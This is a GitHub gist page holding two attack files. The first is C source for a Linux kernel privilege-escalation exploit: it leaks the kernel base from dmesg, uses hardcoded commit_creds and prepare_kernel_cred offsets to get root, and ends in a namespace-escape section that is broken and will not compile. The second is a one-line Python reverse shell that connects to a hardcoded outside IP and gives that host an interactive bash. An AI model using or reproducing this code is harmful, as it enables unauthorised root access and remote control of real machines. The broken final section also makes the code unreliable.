Last active
July 13, 2019 23:24
-
-
Save mellow-hype/df00e90c55a40ec9d6f49c5da9af1fde to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <errno.h> | |
| #include <fcntl.h> | |
| #include <stdarg.h> | |
| #include <stdbool.h> | |
| #include <stddef.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <sched.h> | |
| #include <sys/ioctl.h> | |
| #include <sys/klog.h> | |
| #include <sys/mman.h> | |
| #include <sys/socket.h> | |
| #include <sys/syscall.h> | |
| #include <sys/types.h> | |
| #include <sys/wait.h> | |
| #define ENABLE_KASLR_BYPASS 1 | |
| #define ENABLE_SMEP_SMAP_BYPASS 1 | |
| // Will be overwritten if ENABLE_KASLR_BYPASS | |
| unsigned long KERNEL_BASE = 0xffffffff81000000ul; | |
| // Kernel symbol offsets | |
| #define COMMIT_CREDS 0xa5cf0ul | |
| #define PREPARE_KERNEL_CRED 0xa60e0ul | |
| #define NATIVE_WRITE_CR4 0x64210ul | |
| // Should have SMEP and SMAP bits disabled | |
| #define CR4_DESIRED_VALUE 0x407f0ul | |
| #define KMALLOC_PAD 512 | |
| #define PAGEALLOC_PAD 1024 | |
| // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * | |
| typedef uint32_t u32; | |
| // $ pahole -C hlist_node ./vmlinux | |
| struct hlist_node { | |
| struct hlist_node * next; /* 0 8 */ | |
| struct hlist_node * * pprev; /* 8 8 */ | |
| }; | |
| // $ pahole -C timer_list ./vmlinux | |
| struct timer_list { | |
| struct hlist_node entry; /* 0 16 */ | |
| long unsigned int expires; /* 16 8 */ | |
| void (*function)(long unsigned int); /* 24 8 */ | |
| long unsigned int data; /* 32 8 */ | |
| u32 flags; /* 40 4 */ | |
| int start_pid; /* 44 4 */ | |
| void * start_site; /* 48 8 */ | |
| char start_comm[16]; /* 56 16 */ | |
| }; | |
| // packet_sock->rx_ring->prb_bdqc->retire_blk_timer | |
| #define TIMER_OFFSET 896 | |
| // pakcet_sock->xmit | |
| #define XMIT_OFFSET 1304 | |
| // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * | |
| typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); | |
| typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); | |
| void get_root_payload(void) { | |
| ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))( | |
| ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0) | |
| ); | |
| } | |
| #define SYSLOG_ACTION_READ_ALL 3 | |
| #define SYSLOG_ACTION_SIZE_BUFFER 10 | |
| unsigned long get_kernel_addr() { | |
| int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0); | |
| if (size == -1) { | |
| perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)"); | |
| exit(EXIT_FAILURE); | |
| } | |
| size = (size / getpagesize() + 1) * getpagesize(); | |
| char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE, | |
| MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); | |
| size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size); | |
| if (size == -1) { | |
| perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)"); | |
| exit(EXIT_FAILURE); | |
| } | |
| const char *needle1 = "Freeing SMP"; | |
| char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1)); | |
| if (substr == NULL) { | |
| fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle1); | |
| exit(EXIT_FAILURE); | |
| } | |
| for (size = 0; substr[size] != '\n'; size++); | |
| const char *needle2 = "ffff"; | |
| substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2)); | |
| if (substr == NULL) { | |
| fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle2); | |
| exit(EXIT_FAILURE); | |
| } | |
| char *endptr = &substr[16]; | |
| unsigned long r = strtoul(&substr[0], &endptr, 16); | |
| r &= 0xfffffffffff00000ul; | |
| r -= 0x1000000ul; | |
| return r; | |
| } | |
| int main(void) | |
| { | |
| #if ENABLE_KASLR_BYPASS | |
| printf("[.] KASLR bypass enabled, getting kernel addr\n"); | |
| KERNEL_BASE = get_kernel_addr(); | |
| printf("[.] done, kernel text: %lx\n", KERNEL_BASE); | |
| #endif | |
| printf("[.] commit_creds: %lx\n", KERNEL_BASE + COMMIT_CREDS); | |
| printf("[.] prepare_kernel_cred: %lx\n", KERNEL_BASE + PREPARE_KERNEL_CRED); | |
| printf("[.] executing get root payload %p\n", &get_root_payload); | |
| get_root_payload(); | |
| long long create_new_namespaces=0xffffffff8108aa10; | |
| long long switch_task_namespaces=0xffffffff8108adb0; | |
| struct task_struct *tsk = get_current(); | |
| struct nsproxy { | |
| atomic_t count; | |
| struct uts_namespace *uts_ns; | |
| struct ipc_namespace *ipc_ns; | |
| struct mnt_namespace *mnt_ns; | |
| struct pid_namespace *pid_ns_for_children; | |
| struct net *net_ns; | |
| struct cgroup_namespace *cgroup_ns; | |
| }; | |
| struct nsproxy new_proxy=((&nsproxy)(create_new_namespaces(clone_flags,tsk,uns,tsk->fs))); | |
| /*reset new_proxy*/ | |
| switch_task_namespaces(tsk,new_proxy); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("35.192.3.133",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment